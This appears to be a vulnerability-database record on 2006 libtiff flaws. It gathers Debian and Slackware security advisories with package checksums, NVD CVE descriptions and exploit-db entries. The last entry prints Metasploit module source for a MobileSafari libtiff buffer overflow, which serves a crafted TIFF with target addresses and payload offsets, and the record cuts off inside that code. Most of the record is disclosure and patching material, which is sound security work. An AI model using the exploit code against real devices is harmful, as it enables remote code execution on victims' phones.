http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7woody2_powerpc.deb\n Size/MD5 checksum: 116102 5bb725af64e1f4c2d4a9bc90ab2cc8e0\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7woody2_powerpc.deb\n Size/MD5 checksum: 90618 2e4cfb7cd4e2dee6418fa7f88f01c68f\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7woody2_powerpc.deb\n Size/MD5 checksum: 403142 39f179238a6d70f1a755c7a7751c6b1d\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7woody2_s390.deb\n Size/MD5 checksum: 116912 a4c1ef170588a8be47985338e6f99074\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7woody2_s390.deb\n Size/MD5 checksum: 92814 c33810f1cae1535ceb0d2f06a2cc4875\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7woody2_s390.deb\n Size/MD5 checksum: 395670 0925a01ed6e686c24aecba121ee12a7f\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7woody2_sparc.deb\n Size/MD5 checksum: 132896 653921fed0879588e859ec05555d25ad\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7woody2_sparc.deb\n Size/MD5 checksum: 89798 7097a2950a1a40f46c91cccd97e9fef3\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7woody2_sparc.deb\n Size/MD5 checksum: 397444 82752cc23951fc4e26838a704fd18561\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/t/tiff/tiff_3.7.2-5.dsc\n Size/MD5 checksum: 736 a818c1d8f13bba145e33b79f5b476707\n http://security.debian.org/pool/updates/main/t/tiff/tiff_3.7.2-5.diff.gz\n Size/MD5 checksum: 11836 91da082b84456d159fcea664b99012d2\n http://security.debian.org/pool/updates/main/t/tiff/tiff_3.7.2.orig.tar.gz\n Size/MD5 checksum: 1252995 221679f6d5c15670b3c242cbfff79a00\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-5_alpha.deb\n Size/MD5 checksum: 46922 0c35a8df000764e528ae384ac325b8ad\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-5_alpha.deb\n Size/MD5 checksum: 243676 b8745078cb5af1773f1b28e97a787343\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-5_alpha.deb\n Size/MD5 checksum: 478368 6aa0652b69c62bfc7e51c6781d06fa19\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-5_alpha.deb\n Size/MD5 checksum: 309918 adb7022423ccd165188e8071e19cc442\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-5_alpha.deb\n Size/MD5 checksum: 41048 72d163b97923c66a8b632e1907bc0865\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-5_amd64.deb\n Size/MD5 checksum: 45848 f79893646f9c74fdef624f949fea88ad\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-5_amd64.deb\n Size/MD5 checksum: 217914 b4abe50b4c24e899cbb961612ff3bdb2\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-5_amd64.deb\n Size/MD5 checksum: 459378 d01fdb8c0c066e5e4503b006b696658d\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-5_amd64.deb\n Size/MD5 checksum: 266960 a13564cc4b1ab7cfe8e956a556c8ee25\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-5_amd64.deb\n Size/MD5 checksum: 40618 9114caa1d68c7197f9fa24c1747cd99d\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-5_arm.deb\n Size/MD5 checksum: 45362 fce43634a68f4a8867764f9b8649f07a\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-5_arm.deb\n Size/MD5 checksum: 208490 64553848b27faef1fc6072623904db18\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-5_arm.deb\n Size/MD5 checksum: 453542 16cde56a8e4d74ff39fec6f1cc664171\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-5_arm.deb\n Size/MD5 checksum: 265224 c1e43bfa93d33ea20c970485c2559ec1\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-5_arm.deb\n Size/MD5 checksum: 40112 835f54888f47687d80bd283956b6a433\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-5_i386.deb\n Size/MD5 checksum: 45226 fb6a72018e538b9c01be4f1d7b83f5ee\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-5_i386.deb\n Size/MD5 checksum: 206256 bc2113c8fa422bfa43770aff225ef6a2\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-5_i386.deb\n Size/MD5 checksum: 452596 ecd7de1fd8b95c90a20e8418781c129b\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-5_i386.deb\n Size/MD5 checksum: 251726 5d7ab853c833dbf09fecb7da82a90f1d\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-5_i386.deb\n Size/MD5 checksum: 40666 94f82a8a5aa26e51e6cb5d8dd2b2d6d7\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-5_ia64.deb\n Size/MD5 checksum: 48314 eced941bad1e44163b1732e7d140e47f\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-5_ia64.deb\n Size/MD5 checksum: 268978 791e5bdfdc7ffc390156b80715c76511\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-5_ia64.deb\n Size/MD5 checksum: 511152 6c74c5b71ae314d7332e5c717edb4a0b\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-5_ia64.deb\n Size/MD5 checksum: 330884 e73f9cd34760e6e90705a22a082e701b\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-5_ia64.deb\n Size/MD5 checksum: 42252 6b66dd7679be12ffe5927e6fb4fea6df\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-5_hppa.deb\n Size/MD5 checksum: 46654 d8f619cfa26dde8579513f6d0b81a0f1\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-5_hppa.deb\n Size/MD5 checksum: 230166 1321bf6e1d105ddd339b7e5557aa5719\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-5_hppa.deb\n Size/MD5 checksum: 473080 ab55bbf0033b1b650ee927d21ce9c738\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-5_hppa.deb\n Size/MD5 checksum: 281620 93cf9c2dfa23e2c20e8795dd62dfc1ff\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-5_hppa.deb\n Size/MD5 checksum: 41294 6ff9f727d5da771f334f75d58e118bfe\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-5_m68k.deb\n Size/MD5 checksum: 45238 4020963162aeba32e183855003f5282c\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-5_m68k.deb\n Size/MD5 checksum: 193466 dd132dae95518b681b29f18dc72b5126\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-5_m68k.deb\n Size/MD5 checksum: 442750 64ec9d1c9e3cc0bcf916b685437af60d\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-5_m68k.deb\n Size/MD5 checksum: 234514 7a50d86d056760ff37bbd585b136df14\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-5_m68k.deb\n Size/MD5 checksum: 40270 491986255b51eaccb5ddcece25ecc732\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-5_mips.deb\n Size/MD5 checksum: 46118 2a6f6b1f5e1557c3ef4297ee0eabc985\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-5_mips.deb\n Size/MD5 checksum: 252258 a21f9c0fc9c53b13b14efd641a3cb8ae\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-5_mips.deb\n Size/MD5 checksum: 458604 30db35156ea16a19a75edfb35ad2a14d\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-5_mips.deb\n Size/MD5 checksum: 280506 53f30322a6fc900b4f0ebc5f3d492676\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-5_mips.deb\n Size/MD5 checksum: 40894 170ea7645a3c5543cc5caae43ad5c0a6\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-5_mipsel.deb\n Size/MD5 checksum: 46080 43c5a8ea470cb03a0d2ef8b9933c7857\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-5_mipsel.deb\n Size/MD5 checksum: 252690 857f1625966dbc12f508700a471ac831\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-5_mipsel.deb\n Size/MD5 checksum: 458972 6f4c7d7ffe16f8c99ab81924da944985\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-5_mipsel.deb\n Size/MD5 checksum: 280370 cd2a531fa482b3e48c539e2dd3561494\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-5_mipsel.deb\n Size/MD5 checksum: 40880 a81fef82f1d0a9d7d1001e7a325fee30\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-5_powerpc.deb\n Size/MD5 checksum: 47288 24f1d1ac568afd55118a1fc57f903394\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-5_powerpc.deb\n Size/MD5 checksum: 235464 69addcbeaeeba30abe98dcb1efc1a285\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-5_powerpc.deb\n Size/MD5 checksum: 460614 651e56b2fd88160d3a43b92aba8875eb\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-5_powerpc.deb\n Size/MD5 checksum: 272120 17b13db9ffe5f47941db64522210a26e\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-5_powerpc.deb\n Size/MD5 checksum: 42466 eaa2cce3db4913037c21d73e59cfed63\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-5_s390.deb\n Size/MD5 checksum: 46240 826c2293b0729b990ee4e78f5d44d5c4\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-5_s390.deb\n Size/MD5 checksum: 213880 b4caf3c3eec6f7261af4eaff0f764bbf\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-5_s390.deb\n Size/MD5 checksum: 466012 2371e8d875c366fe532d447f9e4d185a\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-5_s390.deb\n Size/MD5 checksum: 266758 7b6b6981382dccaede04ffef2f5cfea1\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-5_s390.deb\n Size/MD5 checksum: 40886 9e4f621bc83ac85dcf2a56fa7aa59e88\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-opengl_3.7.2-5_sparc.deb\n Size/MD5 checksum: 45530 a6cc6e6db7136497800635f5cd991381\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.7.2-5_sparc.deb\n Size/MD5 checksum: 205358 8f72175e2f33bc5ab15ea5e9b5c77b91\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4_3.7.2-5_sparc.deb\n Size/MD5 checksum: 454782 229cc03ccc4397b839a9545cbe6e6500\n http://security.debian.org/pool/updates/main/t/tiff/libtiff4-dev_3.7.2-5_sparc.deb\n Size/MD5 checksum: 257914 f99730a57980cf56a28dc1ce2a74e016\n http://security.debian.org/pool/updates/main/t/tiff/libtiffxx0_3.7.2-5_sparc.deb\n Size/MD5 checksum: 40616 8d38793d5c79a5498f7c5e0e2f9c37fe\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "modified": "2006-06-08T00:00:00", "published": "2006-06-08T00:00:00", "id": "DEBIAN:DSA-1091-1:7FC74", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00177.html", "title": "[SECURITY] [DSA 1091-1] New TIFF packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2019-05-30T07:37:00", "bulletinFamily": "unix", "description": "New libtiff packages are available for Slackware 9.0, 9.1, 10.0, 10.1,\n10.2, and -current to fix security issues. These issues could be used\nto crash programs linked to libtiff or possibly to execute code as the\nprogram's user.\n\nThanks to Tavis Ormandy and the Google Security Team.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3459\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3460\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3461\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3462\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3463\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3464\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3465\n\n\nHere are the details from the Slackware 10.2 ChangeLog:\n\npatches/packages/libtiff-3.8.2-i486-1_slack10.2.tgz:\n Patched vulnerabilities in libtiff which were found by Tavis Ormandy of\n the Google Security Team. These issues could be used to crash programs\n linked to libtiff or possibly to execute code as the program's user.\n A low risk command-line overflow in tiffsplit was also patched.\n For more details, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3459\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3460\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3461\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3462\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3463\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3464\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3465\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\nfrom ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/libtiff-3.8.2-i386-1_slack9.0.tgz\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/libtiff-3.8.2-i486-1_slack9.1.tgz\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/libtiff-3.8.2-i486-1_slack10.0.tgz\n\nUpdated package for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/libtiff-3.8.2-i486-1_slack10.1.tgz\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/libtiff-3.8.2-i486-1_slack10.2.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libtiff-3.8.2-i486-2.tgz\n\n\nMD5 signatures:\n\nSlackware 9.0 package:\n8b59a74e9a62bd5a6535658ff66b8d11 libtiff-3.8.2-i386-1_slack9.0.tgz\n\nSlackware 9.1 package:\n79406d875eaf03bd100bcf20b54f708c libtiff-3.8.2-i486-1_slack9.1.tgz\n\nSlackware 10.0 package:\n9238ef60318e9c31cbb831a42b0fafcb libtiff-3.8.2-i486-1_slack10.0.tgz\n\nSlackware 10.1 package:\n7f8ecbe32bb9a27ca360f77d49a5f897 libtiff-3.8.2-i486-1_slack10.1.tgz\n\nSlackware 10.2 package:\ne2755a744fab6a838a867db2c12035d2 libtiff-3.8.2-i486-1_slack10.2.tgz\n\nSlackware -current package:\n4820279ae6acb71298c21393c8cdd310 libtiff-3.8.2-i486-2.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg libtiff-3.8.2-i486-1_slack10.2.tgz", "modified": "2006-08-18T01:00:57", "published": "2006-08-18T01:00:57", "id": "SSA-2006-230-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.536600", "title": "libtiff", "type": "slackware", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "cve": [{"lastseen": "2019-05-29T18:08:33", "bulletinFamily": "NVD", "description": "Heap-based buffer overflow in the NeXT RLE decoder in the TIFF library (libtiff) before 3.8.2 might allow context-dependent attackers to execute arbitrary code via unknown vectors involving decoding large RLE images.", "modified": "2017-10-11T01:31:00", "id": "CVE-2006-3462", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3462", "published": "2006-08-03T01:04:00", "title": "CVE-2006-3462", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:08:32", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in the tiffsplit command in libtiff 3.8.2 and earlier might might allow attackers to execute arbitrary code via a long filename. NOTE: tiffsplit is not setuid. If there is not a common scenario under which tiffsplit is called with attacker-controlled command line arguments, then perhaps this issue should not be included in CVE.", "modified": "2018-10-03T21:41:00", "id": "CVE-2006-2656", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2656", "published": "2006-05-30T18:02:00", "title": "CVE-2006-2656", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:08:33", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the custom tag support for the TIFF library (libtiff) before 3.8.2 allows remote attackers to cause a denial of service (instability or crash) and execute arbitrary code via unknown vectors.", "modified": "2017-10-11T01:31:00", "id": "CVE-2006-3465", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3465", "published": "2006-08-03T01:04:00", "title": "CVE-2006-3465", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:08:33", "bulletinFamily": "NVD", "description": "The EstimateStripByteCounts function in TIFF library (libtiff) before 3.8.2 uses a 16-bit unsigned short when iterating over an unsigned 32-bit value, which allows context-dependent attackers to cause a denial of service via a large td_nstrips value, which triggers an infinite loop.", "modified": "2017-10-11T01:31:00", "id": "CVE-2006-3463", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3463", "published": "2006-08-03T01:04:00", "title": "CVE-2006-3463", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:08:33", "bulletinFamily": "NVD", "description": "Heap-based buffer overflow in the PixarLog decoder in the TIFF library (libtiff) before 3.8.2 might allow context-dependent attackers to execute arbitrary code via unknown vectors.", "modified": "2017-10-11T01:31:00", "id": "CVE-2006-3461", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3461", "published": "2006-08-03T01:04:00", "title": "CVE-2006-3461", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:08:33", "bulletinFamily": "NVD", "description": "Heap-based buffer overflow in the JPEG decoder in the TIFF library (libtiff) before 3.8.2 allows context-dependent attackers to cause a denial of service and possibly execute arbitrary code via an encoded JPEG stream that is longer than the scan line size (TiffScanLineSize).", "modified": "2017-10-11T01:31:00", "id": "CVE-2006-3460", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3460", "published": "2006-08-03T01:04:00", "title": "CVE-2006-3460", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:08:33", "bulletinFamily": "NVD", "description": "TIFF library (libtiff) before 3.8.2 allows context-dependent attackers to pass numeric range checks and possibly execute code, and trigger assert errors, via large offset values in a TIFF directory that lead to an integer overflow and other unspecified vectors involving \"unchecked arithmetic operations\".", "modified": "2017-10-11T01:31:00", "id": "CVE-2006-3464", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3464", "published": "2006-08-03T01:04:00", "title": "CVE-2006-3464", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:08:33", "bulletinFamily": "NVD", "description": "Multiple stack-based buffer overflows in the TIFF library (libtiff) before 3.8.2, as used in Adobe Reader 9.3.0 and other products, allow context-dependent attackers to execute arbitrary code or cause a denial of service via unspecified vectors, including a large tdir_count value in the TIFFFetchShortPair function in tif_dirread.c.", "modified": "2017-10-11T01:31:00", "id": "CVE-2006-3459", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3459", "published": "2006-08-03T01:04:00", "title": "CVE-2006-3459", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-01-31T14:58:00", "bulletinFamily": "exploit", "description": "tiffsplit (libtiff. CVE-2006-2656. Local exploit for linux platform", "modified": "2006-05-26T00:00:00", "published": "2006-05-26T00:00:00", "id": "EDB-ID:1831", "href": "https://www.exploit-db.com/exploits/1831/", "type": "exploitdb", "title": "tiffsplit libtiff <= 3.8.2 - Local Stack Buffer Overflow PoC", "sourceData": "# tiffsplit (libtiff <= 3.8.2) local stack buffer overflow PoC\r\n\r\ntiffsplit from libtiff (http://www.remotesensing.org/libtiff/)\r\nis vulnerable to a bss-based and stack-based overflow, but, I just\r\nwrote the concept c0de for stack-based b0f 'cause I don't know how\r\nto take advantage of the overwritten bss data (after the overflow,\r\nthat data is overwritten again correctly by a program' function).\r\n\r\n.bss section is in higher addresses than .dtors section, so, we\r\ncan't hijack .dtors to....\r\n\r\nPoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1831.tar.gz (05262006-tiffspl33t.tar.gz)\r\n\r\nnitr0us <nitrousenador[at]gmail[dot]com>\r\n\r\n# milw0rm.com [2006-05-26]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1831/"}, {"lastseen": "2016-02-02T06:42:27", "bulletinFamily": "exploit", "description": "iPhone MobileSafari LibTIFF Buffer Overflow. CVE-2006-3459. Remote exploit for hardware platform", "modified": "2010-09-20T00:00:00", "published": "2010-09-20T00:00:00", "id": "EDB-ID:16868", "href": "https://www.exploit-db.com/exploits/16868/", "type": "exploitdb", "title": "iPhone MobileSafari LibTIFF Buffer Overflow", "sourceData": "##\r\n# $Id: safari_libtiff.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\t#\r\n\t# This module acts as an HTTP server\r\n\t#\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'iPhone MobileSafari LibTIFF Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a buffer overflow in the version of\r\n\t\t\tlibtiff shipped with firmware versions 1.00, 1.01, 1.02, and\r\n\t\t\t1.1.1 of the Apple iPhone. iPhones which have not had the BSD\r\n\t\t\ttools installed will need to use a special payload.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => ['hdm', 'kf'],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2006-3459'],\r\n\t\t\t\t\t['OSVDB', '27723'],\r\n\t\t\t\t\t['BID', '19283']\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1800,\r\n\t\t\t\t\t'BadChars' => \"\"\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\r\n\t\t\t\t\t[ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\r\n\t\t\t\t\t\t\t# Scratch space for our shellcode and stack\r\n\t\t\t\t\t\t\t'Heap' => 0x00802000,\r\n\r\n\t\t\t\t\t\t\t# Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib\r\n\t\t\t\t\t\t\t'Magic' => 0x300d562c,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Aug 01 2006'\r\n\t\t\t))\r\n\tend\r\n\r\n\tdef on_request_uri(cli, req)\r\n\t\t# Re-generate the payload\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\t# Grab reference to the target\r\n\t\tt = target\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the compressed response to the client\r\n\t\tsend_response(cli, generate_tiff(p, t), { 'Content-Type' => 'image/tiff' })\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\n\tdef generate_tiff(code, targ)\r\n\r\n\t\t#\r\n\t\t# This is a TIFF file, we have a huge range of evasion\r\n\t\t# capabilities, but for now, we don't use them.\r\n\t\t# - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday\r\n\t\t#\r\n\r\n\t\tlolz = 2048\r\n\t\ttiff =\r\n\t\t\t\"\\x49\\x49\\x2a\\x00\\x1e\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\r\n\t\t\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\r\n\t\t\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x01\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x03\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\xaa\\x00\\x00\\x00\\x06\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\xbb\\x00\\x00\\x00\\x11\\x01\\x04\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x17\\x01\\x04\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x15\\x00\\x00\\x00\\x1c\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x50\\x01\\x03\\x00\"+\r\n\t\t\t[lolz].pack(\"V\") +\r\n\t\t\t\"\\x84\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\r\n\t\t# Randomize the bajeezus out of our data\r\n\t\thehe = rand_text(lolz)\r\n\r\n\t\t# Were going to candy mountain!\r\n\t\thehe[120, 4] = [targ['Magic']].pack(\"V\")\r\n\r\n\t\t# >> add r0, r4, #0x30\r\n\t\thehe[104, 4] = [ targ['Heap'] - 0x30 ].pack(\"V\")\r\n\r\n\t\t# Candy mountain, Charlie!\r\n\t\t# >> mov r1, sp\r\n\r\n\t\t# It will be an adventure!\r\n\t\t# >> mov r2, r8\r\n\t\thehe[ 92, 4] = [ hehe.length ].pack(\"V\")\r\n\r\n\t\t# Its a magic leoplurodon!\r\n\t\t# It has spoken!\r\n\t\t# 